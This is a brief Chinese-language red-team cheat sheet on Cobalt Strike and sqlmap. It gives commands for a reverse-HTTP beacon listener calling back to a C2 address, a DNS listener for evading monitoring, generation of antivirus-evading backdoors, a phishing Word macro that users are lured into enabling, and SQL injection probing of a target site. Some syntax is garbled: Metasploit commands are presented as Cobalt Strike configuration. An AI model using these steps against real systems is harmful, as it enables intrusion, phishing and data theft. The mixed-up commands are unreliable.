3.1 工具使用
3.1.1 CobaltStrike 高级用法
监听器(Listener)配置
- HTTP/HTTPS监听器:
# 配置HTTP监听器(默认端口80) set payload windows/beacon_http/reverse_http set Host 192.168.1.10 set Port 80 exploit -j
- DNS监听器:绕过网络监控,通过DNS协议回传数据(需配置域名解析指向C2服务器)。
后门生成与权限维持
- Windows可执行文件:
bash # 生成免杀后门(使用混淆模板) ./agscript.sh <团队服务器> <用户> <密码> artifact-kit/pe_templates_template.x64.exe
- Office宏后门:
1. 生成宏Payload:Attacks → Packages → Microsoft Office Macro。
2. 插入Word文档,诱导用户启用宏触发上线。
3.1.2 Sqlmap 自动化注入实战
基础命令
# 检测目标是否存在注入
sqlmap -u "http://target.com/page?id=1" --batch
# 获取数据库名称
sqlmap -u "http://target.com/page?id=1" --dbs